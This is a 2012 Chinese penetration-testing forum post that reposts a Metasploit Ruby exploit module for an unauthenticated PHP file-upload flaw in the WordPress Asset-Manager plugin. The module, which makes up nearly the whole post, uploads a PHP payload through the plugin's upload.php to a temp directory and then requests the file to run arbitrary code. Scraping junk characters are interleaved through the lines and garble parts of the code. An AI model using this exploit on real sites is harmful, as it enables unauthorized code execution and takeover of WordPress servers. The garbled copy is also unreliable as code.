找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2712|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。, K. z$ }' {1 S7 V3 O8 X8 e! @  `# b! q

) c# E+ @' U# D! e5 L5 n- D1 q##
7 M) c5 S2 j8 S# [6 Z$ z: R; l+ S# This file is part of the Metasploit Framework and may be subject to
% ]% V2 \5 c8 u1 Q7 }3 n# redistribution and commercial restrictions. Please see the Metasploit+ H$ p! s1 e6 {" h3 e6 g3 X
# Framework web site for more information on licensing and terms of use.
' `& z2 F* M  G$ m# ~- ~3 l#   http://metasploit.com/framework/
/ h( V* I# d  t/ G" q##
' A; h$ a2 H6 O
2 g" o% @8 B) J( r$ P6 h% Brequire 'msf/core'" R  Q1 }. J7 X" P  C0 C
require 'msf/core/exploit/php_exe'4 k+ U& C  S4 A

! L0 W9 Z: o( xclass Metasploit3 < Msf::Exploit::Remote
7 ?- B. e. F4 w  Rank = ExcellentRanking
6 c3 U' D" u( j , f1 U: O8 ~% h9 e& v( p* v, a* n
  include Msf::Exploit::Remote::HttpClient  e& T' L; o. N3 @3 t; i3 v
  include Msf::Exploit:hpEXE$ i1 ~7 i% J! E1 [. ?4 k- p7 ]

, q8 x6 m8 L3 f  def initialize(info = {})
( `9 ?/ i. V8 B; I7 D( g. z- b! r    super(update_info(info,
: m# F6 H: i8 q7 a9 p3 u& n6 @/ ]/ J      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',9 Y: p7 ?- H& k
      'Description'    => %q{' D" C) Y( ]* A5 b; r0 y7 |
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress" ]6 Z$ V# }' E
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a4 a2 x% Z9 e7 u9 O/ T) p
        temp directory without authentication, which results in arbitrary code execution.6 q  V* `; x$ F# j% |
      },5 p3 O8 O1 h( a' u* [
      'Author'         =>+ o/ m/ M& y7 g& W4 n' m
        [/ R2 v# q: I  Z5 u1 H
          'Sammy FORGIT', # initial discovery. z$ B8 Y2 q, r7 @$ e
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. d" \1 J. u, t: v; @! `  v& k$ U        ],5 W& b" ]& C5 z" T
      'License'        => MSF_LICENSE,3 n' t( m% C( Q
      'References'     =>
- |0 |' _; B2 `0 a7 t' x        [
3 _0 o, f+ ]/ {1 z          [ 'OSVDB', '82653' ],
* ~! {7 s( Z/ J# k          [ 'BID', '53809' ],
, I  O; O4 W8 o& S& C" T% g( W4 K0 m6 |          [ 'EDB', '18993' ],
& H0 [. G! ]( m; S% Z          [ 'URL', 'http:// www.myhack58.com /' ]
+ p6 g% j0 G# Q- R& c: \        ],, I8 {4 C3 s% ]3 ]
      'Payload'       =>( c% l' h% A6 S  X* H
        {
' z5 x; T; O$ b          'BadChars' => "\x00",% e5 K. Q  u$ e( P
        },! V# L" ?; G- E8 S8 V
      'Platform'       => 'php',
4 A* N9 ?: C, r  Y1 g; l      'Arch'           => ARCH_PHP,
. W8 q9 C  F' a) N      'Targets'        =>
1 ]' t1 W7 r* f! y+ \, h& }        [
: W+ t9 q! A2 ^) M" w& w* H          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],' C6 G- b# L$ ^
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
: E4 k& O; S6 W/ @" _9 H9 A        ],
: L9 J* }! ]8 d, J: L1 D      'DefaultTarget' => 0,6 H: L1 c/ g" @3 @8 W% A* f  L
      'DisclosureDate' => 'May 26 2012'))
5 ]4 c3 |+ A) ]. O+ t9 I9 I7 Y
5 [  c& P  U- e- c! P. T0 z    register_options(
) L( A+ s" X. L      [+ K) W5 n  S- o$ q( [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])0 G5 m% ^4 Z7 w# h& e
      ], self.class)/ E  e: {* N( j/ l# B, S
  end& l& S2 }6 K4 S' X

2 U6 g( R4 w3 V: @0 w  def exploit
' d; |: L* t: ]! C% p) n    uri =  target_uri.path
' ^# }0 v: m# C" B  p% ]' p    uri << '/' if uri[-1,1] != '/'
5 P! z1 u2 Z. ^  {: V" ~) j    peer = "#{rhost}:#{rport}". S4 H4 ]3 }$ B  r" z
    payload_name = "#{rand_text_alpha(5)}.php"$ j5 [% q* E/ @
    php_payload = get_write_exec_payload(:unlink_self=>true)
% w, a8 i; J: @( w 8 P3 j/ e( [; N; d2 L0 u
    data = Rex::MIME::Message.new8 o0 E6 N7 A8 N- j4 l7 S. O4 I4 K( ~
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")- n7 D; P' E  v1 Q8 Y
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'), X* h$ u$ i2 Z9 q4 |
2 U! b* O3 j2 B
    print_status("#{peer} - Uploading payload #{payload_name}")3 G) |# e5 m4 v- X8 R! T* U$ t! ~
    res = send_request_cgi({3 Z, i7 r# \+ c
      'method'  => 'POST',
! h% A- C  w" y9 Y      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",* H. {; F6 w* m! K) [$ S
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
$ |# s0 B7 D2 |& ?+ B      'data'    => post_data
. R& h- Q! ~4 t5 u  g; U    })
2 a& q2 E2 \  ~: {9 I( z % H1 g7 S5 C" ^
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
% P$ j, I$ `4 e! c      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")2 x, |/ {1 u; h; L' p' R
end. w; r/ M0 s5 k4 Q* R& Y
0 g; I: m  }1 ?' e5 v
    print_status("#{peer} - Executing payload #{payload_name}")
+ S4 S4 o' ^- L    res = send_request_raw({- I: E1 ^6 Q. A
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
( t2 D* H  h1 E. b      'method'  => 'GET'. t! T* \7 O9 M/ f
    })) Y9 F( k# I/ z# ]. S1 ?
/ C+ r3 A; z$ J" R
    if res and res.code != 200
, C: J7 P( z; ^( E; F0 J      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
1 ~. m) s6 L9 R( O2 D    end) p+ Y, W' ]$ \2 Q3 Z+ f" ]
  end
7 g( {% ^" f3 ]end
3 A% e- O1 E5 K7 ^+ o  N
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表